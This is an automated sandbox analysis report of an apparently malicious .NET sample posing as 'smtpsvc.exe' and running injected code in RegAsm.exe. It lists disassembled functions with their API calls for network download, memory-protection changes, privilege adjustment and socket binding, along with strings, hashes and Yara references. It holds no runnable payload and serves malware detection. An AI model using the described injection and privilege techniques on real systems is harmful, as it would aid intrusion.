Commandline:	'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
Imagebase:	0x1240000
File size:	53248 bytes
MD5 hash:	246BB0F8D68A463FD17C235DEB5491C0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: RegAsm.exe PID: 2488 Parent PID: 2680 RegAsm.exeCOMMON

Executed Functions

Function 007938C8, Relevance: 4.5, Strings: 3, Instructions: 766COMMON

Download Yara Rule

Strings

{d, xrefs: 0079407C
Tt, xrefs: 007940F8
*_qq, xrefs: 00794095

Memory Dump Source

Source File: 00000006.00000002.2371824647.0000000000790000.00000040.00000001.sdmp, Offset: 00790000, based on PE: false

Similarity

API ID:
String ID: *_qq$Tt${d
API String ID: 0-811126265
Opcode ID: 31dbe78ccdf7fc00038e5d6e136e8a0a78bc174746657444147a2b8d3451d7b6
Instruction ID: d03d444cd7bfc7dea7f17c5982474b9676993850c9abf41033fd234441013667
Opcode Fuzzy Hash: 31dbe78ccdf7fc00038e5d6e136e8a0a78bc174746657444147a2b8d3451d7b6
Instruction Fuzzy Hash: E652F471A0420ACFCF14DF68D88096EFBB2FF85304B25C6AAD4599B256D734EE41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00284447, Relevance: 3.1, APIs: 2, Instructions: 130networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(00284BE0,00000000,00000000,00000000,00000000), ref: 0028446C
InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 0028456A

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: c92f8f898d4b5f9d4141d777c3fee18955f3ebc4cd22d55500e37f371e9e3994
Instruction ID: 17e508c0309c8bf2b6a385daf7f2d0f7c88cb99820eb95dfa61a9298ccb6a706
Opcode Fuzzy Hash: c92f8f898d4b5f9d4141d777c3fee18955f3ebc4cd22d55500e37f371e9e3994
Instruction Fuzzy Hash: B1410A3827A387DBFF34BE50CD41BFE36959F01340F608529AD0B9A0C0E7B58564AB11

Uniqueness

Uniqueness Score: -1.00%

Function 00792418, Relevance: 3.0, Strings: 2, Instructions: 505COMMON

Download Yara Rule

Strings

_qq, xrefs: 00792739
_qq, xrefs: 00792A3A

Memory Dump Source

Source File: 00000006.00000002.2371824647.0000000000790000.00000040.00000001.sdmp, Offset: 00790000, based on PE: false

Similarity

API ID:
String ID: _qq$_qq
API String ID: 0-1484419985
Opcode ID: ef3b87f0cec4a821bc173d5f104161a95372bfe637b846bc12fb2b7bdcb2ad1e
Instruction ID: a4608ca4536f56bf17523c313afe9dab940230ba8876366900a51a8ee8b93029
Opcode Fuzzy Hash: ef3b87f0cec4a821bc173d5f104161a95372bfe637b846bc12fb2b7bdcb2ad1e
Instruction Fuzzy Hash: 9912D070A00225EFCB14EF64E89066EB7F2FF89311F24816DD4159B3A2EB799D46CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00798CF0, Relevance: 3.0, Strings: 2, Instructions: 505COMMON

Download Yara Rule

Strings

_qq, xrefs: 00799011
_qq, xrefs: 00799312

Memory Dump Source

Source File: 00000006.00000002.2371824647.0000000000790000.00000040.00000001.sdmp, Offset: 00790000, based on PE: false

Similarity

API ID:
String ID: _qq$_qq
API String ID: 0-1484419985
Opcode ID: eb48a705d8fbccebbca906a4edfbef449af48a2bc6d44b18afa45f6436d97f15
Instruction ID: 82a0b0d07cab73b30760b196d7c4dc34e32a4da971a6ec9e7ea9366e3786d15b
Opcode Fuzzy Hash: eb48a705d8fbccebbca906a4edfbef449af48a2bc6d44b18afa45f6436d97f15
Instruction Fuzzy Hash: 7B12DF70A00616CFEB14DF78D894A6DB7F2BF89314F64816DD01ADB2A1DB399C82DB41

Uniqueness

Uniqueness Score: -1.00%

Function 00799C03, Relevance: 2.7, Strings: 2, Instructions: 213COMMON

Download Yara Rule

Strings

*_qq, xrefs: 00799C77
, xrefs: 00799D43

Memory Dump Source

Source File: 00000006.00000002.2371824647.0000000000790000.00000040.00000001.sdmp, Offset: 00790000, based on PE: false

Similarity

API ID:
String ID: $*_qq
API String ID: 0-996541083
Opcode ID: 3f3165ecb60d758a2af2920f8cb8eace4614740b3348264b0c2045c4a9f54fa2
Instruction ID: 84fed138280fa13bc7a49ac89991a04b99c9d9dc80b7d86c9a6984575ca9fd10
Opcode Fuzzy Hash: 3f3165ecb60d758a2af2920f8cb8eace4614740b3348264b0c2045c4a9f54fa2
Instruction Fuzzy Hash: D461C472B081048FEF14DB7DE8845AEBBF2EBC6310B24847ED616DB255DA399D028761

Uniqueness

Uniqueness Score: -1.00%

Function 0079B5C0, Relevance: 2.2, Strings: 1, Instructions: 919COMMON

Download Yara Rule

Strings

r, xrefs: 0079C074

Memory Dump Source

Source File: 00000006.00000002.2371824647.0000000000790000.00000040.00000001.sdmp, Offset: 00790000, based on PE: false

Similarity

API ID:
String ID: r
API String ID: 0-1812594589
Opcode ID: d1d7a84a20f08d3473571ff169362d2256b5abff5a54244ba63c843443c102ad
Instruction ID: 105cd2bdfbae519d1c0ed4b1a29ae2803c96d95cbac2704150fdb8ee83dfa836
Opcode Fuzzy Hash: d1d7a84a20f08d3473571ff169362d2256b5abff5a54244ba63c843443c102ad
Instruction Fuzzy Hash: 66825874A00605CFCB14CF68E984AADFBF2FF88310F158569D51AAB652D734E985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 007B28C3, Relevance: 1.6, APIs: 1, Instructions: 81networkCOMMON

Download Yara Rule

APIs

bind.WS2_32(?,00000EA4,5C79B353,00000000,00000000,00000000,00000000), ref: 007B2957

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: bind
String ID:
API String ID: 1187836755-0
Opcode ID: 0cf504e9b6b3e73996f371a65c0a541d98f9c6ee21ab859a8666efe5896abd58
Instruction ID: 5586bb26b86194c79330ab79513b8fd0e24e7eb5a2cd24d90e18fb1003f98068
Opcode Fuzzy Hash: 0cf504e9b6b3e73996f371a65c0a541d98f9c6ee21ab859a8666efe5896abd58
Instruction Fuzzy Hash: 06219471509380AFE712CF61DC44F96BFA8EF46310F08849BE948DF193D268A909C771

Uniqueness

Uniqueness Score: -1.00%

Function 007B1463, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 007B14E3

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 642d7f91bacf910f8f89130a8a20ba7643f5d4a0c5ad3bd0b0cac81152194617
Instruction ID: 999f099ded66a3dcb4d616c4ddfa3498cd87aee82807fd54bda6d3d9bc7e6f5d
Opcode Fuzzy Hash: 642d7f91bacf910f8f89130a8a20ba7643f5d4a0c5ad3bd0b0cac81152194617
Instruction Fuzzy Hash: 5521BF765093809FEB228F25DC44B92BFF4EF16310F0884DAE9858B563D275A918DB62

Uniqueness

Uniqueness Score: -1.00%

Function 0028725D, Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59ee80fa3d4289d05d21d49b0a6a52ffc5425c9bbe9a97edfb1bb4664898dab6
Instruction ID: bb3ca32a86ffdd79f269d19e243ebccd9615811aa49eeeded12182286ad718d9
Opcode Fuzzy Hash: 59ee80fa3d4289d05d21d49b0a6a52ffc5425c9bbe9a97edfb1bb4664898dab6
Instruction Fuzzy Hash: E9112E2953D2128EDF31ED348C9461A67519B96330F348756EC62CB1DEC230D4A2D312

Uniqueness

Uniqueness Score: -1.00%

Function 007B2E3E, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSARecv.WS2_32(?,00000EA4,5C79B353,00000000,00000000,00000000,00000000), ref: 007B2EAE

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: Recv
String ID:
API String ID: 4192927123-0
Opcode ID: 470570bd61d545d5758befc77e8d067f098703a37493db5437f435f47442065a
Instruction ID: fee4a7e49dba563715f3a99a9597d13df794e9827edffbacad9096606a42a4a1
Opcode Fuzzy Hash: 470570bd61d545d5758befc77e8d067f098703a37493db5437f435f47442065a
Instruction Fuzzy Hash: 6411AF72400704EFEB21CF51DC84FA6FBE8EF04310F14896AFA459A652D675E905CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 007B17CF, Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 007B1845

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 67668e696dad85ed59fda17f507d934a186e1443aa9e3b3ed59747a299ffde6a
Instruction ID: 5f40903b7b1f1b335be208901d59db09d9d733603d3552cd2587424499a548c3
Opcode Fuzzy Hash: 67668e696dad85ed59fda17f507d934a186e1443aa9e3b3ed59747a299ffde6a
Instruction Fuzzy Hash: 7C21DE724093C09FDB238B21DC55A51FFB0EF17324F0980CBE9848B1A3D269A909DB62

Uniqueness

Uniqueness Score: -1.00%

Function 007B28F6, Relevance: 1.6, APIs: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

bind.WS2_32(?,00000EA4,5C79B353,00000000,00000000,00000000,00000000), ref: 007B2957

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: bind
String ID:
API String ID: 1187836755-0
Opcode ID: 418a4e16de0826494de6c9bd901772862cc7a14455c5af7430ba93399f5444fd
Instruction ID: 3d6135c2a2f4f601115dfe65e8a57ea91b52229cf79a6436a533db6b9034e454
Opcode Fuzzy Hash: 418a4e16de0826494de6c9bd901772862cc7a14455c5af7430ba93399f5444fd
Instruction Fuzzy Hash: 4011BF72501300EFEB20DF55DC85FA6FBE8EF44720F14846AED499B242D674A905CAB6

Uniqueness

Uniqueness Score: -1.00%

Function 007B149A, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 007B14E3

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 02749aabc9aa60449eb2ceff2db6da4ff64603ba1183eac4d3b28c49b620229d
Instruction ID: b9719d1c87d0c045ce6752784c15b60b5274af3b1b1981d37b96436c3714cdd6
Opcode Fuzzy Hash: 02749aabc9aa60449eb2ceff2db6da4ff64603ba1183eac4d3b28c49b620229d
Instruction Fuzzy Hash: 60117C76600740DFEB21CF55D884BA6FBE4EF04320F4884AAED4A8B652D375E814DB62

Uniqueness

Uniqueness Score: -1.00%

Function 007B11C2, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,5C79B353,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 007B11F4

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 7cb39fbd8a9b4aa5bc0eea3ca0c00773cce33c632779ab5bd30385df396097df
Instruction ID: 192469ca10640f58953e9016dc0d221ea3512d49abc46ede7d75ea28408c3257
Opcode Fuzzy Hash: 7cb39fbd8a9b4aa5bc0eea3ca0c00773cce33c632779ab5bd30385df396097df
Instruction Fuzzy Hash: 5401A275500244DFEB20CF55E885795FBA0EF44320F88C4AADD498B642D279A504CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 007B180A, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 007B1845

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: b6c5365fb1faf82b5e81213b45ff5887fe20acd269d503922779ce26e8b6064c
Instruction ID: 72a200ff4368d562e9888d1db89bbd2a79462fe4c0c00681d0493ae7fbf7c1f1
Opcode Fuzzy Hash: b6c5365fb1faf82b5e81213b45ff5887fe20acd269d503922779ce26e8b6064c
Instruction Fuzzy Hash: 7A01A235500740DFEB20CF45D885B61FFA0FF04720F48C09ADD894B612D375A418DB62

Uniqueness

Uniqueness Score: -1.00%

Function 002872B9, Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c542b300be66409c06ac21aaa81eccc0977cd4e651de673b1161aeef4425a31c
Instruction ID: 82d9066f9e017bbc3261523a6278b2c09fab56fec9fa6f0625738f16e5d6062d
Opcode Fuzzy Hash: c542b300be66409c06ac21aaa81eccc0977cd4e651de673b1161aeef4425a31c
Instruction Fuzzy Hash: 06E0E56E83E1558CEF35B9344D999295B06A7A6334B74D36AFD62960CEC250C0B2A323

Uniqueness

Uniqueness Score: -1.00%

Function 00287322, Relevance: 1.5, APIs: 1, Instructions: 15nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,00286D19,00000040,00282DA4,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 0028734F

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 444fbf3b655c48cf52a3f1ea143fe150c7139649c407c25e2fc59e1d3aa4b2fb
Instruction ID: 7ed942fbbc7477b57927757a29a42d2f22aedb99d558a099c603e39248d0af97
Opcode Fuzzy Hash: 444fbf3b655c48cf52a3f1ea143fe150c7139649c407c25e2fc59e1d3aa4b2fb
Instruction Fuzzy Hash: A7C012E41260006E68148A2CCD44C3777AA87D5728B24C31DF872362CCC530DC065176

Uniqueness

Uniqueness Score: -1.00%

Function 00287311, Relevance: 1.5, APIs: 1, Instructions: 15nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,00286D19,00000040,00282DA4,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 0028734F

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: b2112d61fc788925bf9428e4cbe7be249086fba8958136a9f866a9496ae4e29e
Instruction ID: c113bd5c58168719d40784d445ae6f9816ca40af73ed0c91b3636c9117f83599
Opcode Fuzzy Hash: b2112d61fc788925bf9428e4cbe7be249086fba8958136a9f866a9496ae4e29e
Instruction Fuzzy Hash: F9C08CEA036000387D2865B84D08C2B091A80F1B3D3A2C379B432300DE9620D068B032

Uniqueness

Uniqueness Score: -1.00%

Function 00284C64, Relevance: 1.5, APIs: 1, Instructions: 10libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00284C7D

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c7cdea4675d7ede2fdc96be99a62241a8d9aae21c31fb199dbd7fecd9312f138
Instruction ID: 9e1b99993adaf852d6171f6e32e6910ed529ec217c04a618248b91acf7d5b11b
Opcode Fuzzy Hash: c7cdea4675d7ede2fdc96be99a62241a8d9aae21c31fb199dbd7fecd9312f138
Instruction Fuzzy Hash: F3C08036105B05CBD705FB34C54ABCF7710EF80B01F004935E4074B455DF245529DE95

Uniqueness

Uniqueness Score: -1.00%

Function 007998F0, Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2371824647.0000000000790000.00000040.00000001.sdmp, Offset: 00790000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bbb4c0fc7c5c3e88ca2e418f7b82c63fd1e29ebfe6fb2f07e57c73485959157
Instruction ID: e4b22a6190ebf631748a55e5aa3fdbc5fa4abfeefbbef4dd4fa25a4ecf30640e
Opcode Fuzzy Hash: 6bbb4c0fc7c5c3e88ca2e418f7b82c63fd1e29ebfe6fb2f07e57c73485959157
Instruction Fuzzy Hash: AE818E72F111168BEB14DB6DE890A6EB7A3AFC4310B29817DD5099B355DE39EC018790

Uniqueness

Uniqueness Score: -1.00%

Function 007999B7, Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2371824647.0000000000790000.00000040.00000001.sdmp, Offset: 00790000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5743ba01be54c5d43b55cb4ef76b8999f3d1f11b50afcaba4120278672e2d153
Instruction ID: 1b944fb4693798d802a9ac5a1cdabce61c6b1fcb50df62ec8f528d4e9e914f35
Opcode Fuzzy Hash: 5743ba01be54c5d43b55cb4ef76b8999f3d1f11b50afcaba4120278672e2d153
Instruction Fuzzy Hash: 29515B72F111168BD714DB6DD990B5EB6E3AFC4310F2AC168E409EB365DE39DD018B90

Uniqueness

Uniqueness Score: -1.00%

Function 002857E5, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

802A, xrefs: 00285844
802A, xrefs: 0028582E

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 802A$802A
API String ID: 0-3301691846
Opcode ID: 1c041e1c7c560f6c9aae6388e5e52ff3a6ab9264015d4d69264a4c91e4d7dbf9
Instruction ID: c7aae921c0165a55899fecbd84f768032f6156370235ba9cedf46a9ec2f64fd3
Opcode Fuzzy Hash: 1c041e1c7c560f6c9aae6388e5e52ff3a6ab9264015d4d69264a4c91e4d7dbf9
Instruction Fuzzy Hash: 0151282D43BA76DFCB15BE2085E06A93B50BF01320B39455AEC469B1C2D2A0DDB1D781

Uniqueness

Uniqueness Score: -1.00%

Function 00284435, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 128networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(00284BE0,00000000,00000000,00000000,00000000), ref: 0028446C
InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 0028456A

Strings

Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, xrefs: 00284BE0

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
API String ID: 2038078732-3478744561
Opcode ID: a3cc45b56c3df15675c5e11d6bd44638c4f619360098f89bd4a09e752c887459
Instruction ID: 2f7ab9d45c70cfcd4d5b47e41eec70a78c833a9015bcff66e85ce6b0606885f0
Opcode Fuzzy Hash: a3cc45b56c3df15675c5e11d6bd44638c4f619360098f89bd4a09e752c887459
Instruction Fuzzy Hash: C0415A3813A3839BEB31BF20CD517EA3BA4AF02340F64841D9C469A0C2E3B59560E755

Uniqueness

Uniqueness Score: -1.00%

Function 002843F1, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 135COMMON

Download Yara Rule

Strings

Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, xrefs: 00284BE0

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
API String ID: 2038078732-3478744561
Opcode ID: cd67d3d84984d6c18c11cd09c45ada4c5543ac2c6e4d812cf8bcc8e87a296293
Instruction ID: 9b10edf52737b0a86d7f5e92cd1f18815baaea3d5f717a5f85570fda484521a1
Opcode Fuzzy Hash: cd67d3d84984d6c18c11cd09c45ada4c5543ac2c6e4d812cf8bcc8e87a296293
Instruction Fuzzy Hash: 0141273813A383DBEB31BF20CD517EA3BA5AF02340F64842D9D469A0C2E3B59560E755

Uniqueness

Uniqueness Score: -1.00%

Function 002858E6, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,00286BDF,00282DA4,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 00285947

Strings

_7, xrefs: 00285914

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: _7
API String ID: 1029625771-3584635582
Opcode ID: 262f675f28b0c84640b2cac44536098fea5bb3f266b5cdb892bd23afbd761918
Instruction ID: fb23403086e8a01887c99efdac02d74727a30742ec052346ad59469f2e9fd3a7
Opcode Fuzzy Hash: 262f675f28b0c84640b2cac44536098fea5bb3f266b5cdb892bd23afbd761918
Instruction Fuzzy Hash: 23D0A72E7BB635DFCB023A1424302DC1B054956370739C062E86DCF1D2C274896697C0

Uniqueness

Uniqueness Score: -1.00%

Function 00284419, Relevance: 3.1, APIs: 2, Instructions: 101networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(00284BE0,00000000,00000000,00000000,00000000), ref: 0028446C
InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 0028456A

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 11e87afe09da77163337326205c63acb26fddc1a92923defacdf0ce99f81259e
Instruction ID: 8fa46d91566ceb3ea1d8b46a1b6603ae4e45d2c10d1c95a747d29abc91b66b3c
Opcode Fuzzy Hash: 11e87afe09da77163337326205c63acb26fddc1a92923defacdf0ce99f81259e
Instruction Fuzzy Hash: 4C31FB38276347DBFF347E10CD51BFE22999F01740F608425AD0BEA0C1E7B59564A715

Uniqueness

Uniqueness Score: -1.00%

Function 00792DD0, Relevance: 2.6, Strings: 2, Instructions: 135COMMON

Download Yara Rule

Strings

*_qq, xrefs: 00792E1D
, xrefs: 00792EEE

Memory Dump Source

Source File: 00000006.00000002.2371824647.0000000000790000.00000040.00000001.sdmp, Offset: 00790000, based on PE: false

Similarity

API ID:
String ID: $*_qq
API String ID: 0-996541083
Opcode ID: 232fccc7cc371ac470654dca13ba61830ec699169097a70966ab1d69ce1ae49a
Instruction ID: 61cf786c5fdc89d1dbfe1b5ee4866f979c73d17617454b8b30a9b349a28f458c
Opcode Fuzzy Hash: 232fccc7cc371ac470654dca13ba61830ec699169097a70966ab1d69ce1ae49a
Instruction Fuzzy Hash: 9741D430F08245ABCF10FF65D8841AEBB73AB85310B68C57AD516DB607D639EC038791

Uniqueness

Uniqueness Score: -1.00%

Function 0028281C, Relevance: 1.7, APIs: 1, Instructions: 177threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 00282927

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 47b2006eb764788e42cd0cd6c0039f5bac512d169a1e08886e86bb8148b6dfed
Instruction ID: d864406f02d08de2123c4bfb6b974eff3cf1a40835f3f11291fe3e090b578d78
Opcode Fuzzy Hash: 47b2006eb764788e42cd0cd6c0039f5bac512d169a1e08886e86bb8148b6dfed
Instruction Fuzzy Hash: FE11297C137303DFDB20BA44C989BAA3614EF26324F310292E917571D6D3E5D8A59B26

Uniqueness

Uniqueness Score: -1.00%

Function 002877B5, Relevance: 1.6, APIs: 1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10c56c1bfea4f759a6abb84da7824f1c825dc949d998d285604adeb14f952c2f
Instruction ID: d97c32a108b4a4f1fb0b8db0a8aa885e1c398e6ddb9d67fb92c2dcc57af0f834
Opcode Fuzzy Hash: 10c56c1bfea4f759a6abb84da7824f1c825dc949d998d285604adeb14f952c2f
Instruction Fuzzy Hash: 7931F32D23F212CDEF157924C86C7A96792FB51364F794656CC0ACB1D1C3A4C8E1E742

Uniqueness

Uniqueness Score: -1.00%

Function 0028775D, Relevance: 1.6, APIs: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 0028799D

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 3363076479bd9988d013c01d22f34f101fa028d9033f266eebfe92de6067fcf7
Instruction ID: a39e5ac73603cabc93b892483c9ffad35ebf78cd49d4ee7a87316dcbaa05798f
Opcode Fuzzy Hash: 3363076479bd9988d013c01d22f34f101fa028d9033f266eebfe92de6067fcf7
Instruction Fuzzy Hash: FA31C32D63F206CEEB147E24C9583B96692FF55354F79426ACC0B876D1C3B8C8A4E742

Uniqueness

Uniqueness Score: -1.00%

Function 007B1950, Relevance: 1.6, APIs: 1, Instructions: 102registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EA4,?,?), ref: 007B1A0E

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 066d1f5b08daadde3dcd6fcd6949dfc9e579766b7a29fe76825ebc75401c31c7
Instruction ID: 2b95604cf4c53df2f85515b10d0eb6d8a706d21c43f3a8bd9f9c4187ba462060
Opcode Fuzzy Hash: 066d1f5b08daadde3dcd6fcd6949dfc9e579766b7a29fe76825ebc75401c31c7
Instruction Fuzzy Hash: F4314A6550E3C0AFD3138B258C61B61BF74EF47610F0E85CBE8849F5A3D2696919C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 007B0EB8, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNEL32(?,00000EA4), ref: 007B0F5B

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 4af22f99e806dcae7b6532fb8c81c8596a2e3c6fc9a29d55d0a14ac1ea015926
Instruction ID: 2325ae4165a305369240142a300da73b70984b1eb1acea585476274cb896574e
Opcode Fuzzy Hash: 4af22f99e806dcae7b6532fb8c81c8596a2e3c6fc9a29d55d0a14ac1ea015926
Instruction Fuzzy Hash: 2C31D372504344AFEB22CF61CC44FA7BFACEF05310F04899AF985CB152D224A809CB61

Uniqueness

Uniqueness Score: -1.00%

Function 007B0C58, Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

GetTempFileNameW.KERNEL32(?,00000EA4,?,?), ref: 007B0D1A

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: FileNameTemp
String ID:
API String ID: 745986568-0
Opcode ID: dbc780fcff439eefb2d4aebf57d6ec4a06941febf7cf1322d8f464924c2f1456
Instruction ID: 2538a1fa1aa5a18ba78188fcccd564248cd36913f7cd448f9652bac29c71a31d
Opcode Fuzzy Hash: dbc780fcff439eefb2d4aebf57d6ec4a06941febf7cf1322d8f464924c2f1456
Instruction Fuzzy Hash: 59315C6150E3C09FD3038B758C51B62BFB4EF47610F0E85DBD8849F5A3D2296919C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 007B0390, Relevance: 1.6, APIs: 1, Instructions: 93registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(?,00000EA4), ref: 007B045E

Memory Dump Source

Source File: 00000006.00000002.2371846050.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: ab525eb97a44b816d4958a5a4b2ff4669a360e04a3d27001a7677b9f16b96990
